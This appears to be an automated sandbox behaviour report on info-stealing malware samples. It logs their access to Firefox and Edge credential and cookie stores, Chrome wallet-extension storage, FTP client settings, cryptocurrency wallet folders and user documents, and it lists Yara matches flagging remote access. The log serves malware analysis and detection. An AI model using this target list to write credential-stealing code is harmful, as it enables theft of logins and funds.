Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: number of queries: 1413
Source: Yara match File source: 0000000D.00000003.2629694606.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2672725289.00000000010CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2585953036.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2585858854.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2658132730.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2628157062.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1729402235.00000000011BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2604592172.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2628798588.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7492, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6cadd3f0fd.exe PID: 7516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6cadd3f0fd.exe PID: 6292, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 0000000C.00000003.2607023655.0000000000C3F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 275df0ca27.exe PID: 2312, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6cadd3f0fd.exe PID: 7516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6cadd3f0fd.exe PID: 6292, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: file.exe PID: 7492, type: MEMORYSTR
Source: Yara match File source: 28.2.num.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.1171a5b648.exe.f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.num.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.1171a5b648.exe.f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.2529289944.00000000000F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2692045054.000000000117B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2604298529.0000000000E9E000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2531875867.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.2588138718.0000000000E9E000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2611179744.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2488093515.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2604161455.0000000000E81000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.2588009468.0000000000E81000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.2632031246.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2685024844.00000000000F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1171a5b648.exe PID: 2032, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6072, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 1171a5b648.exe PID: 2148, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP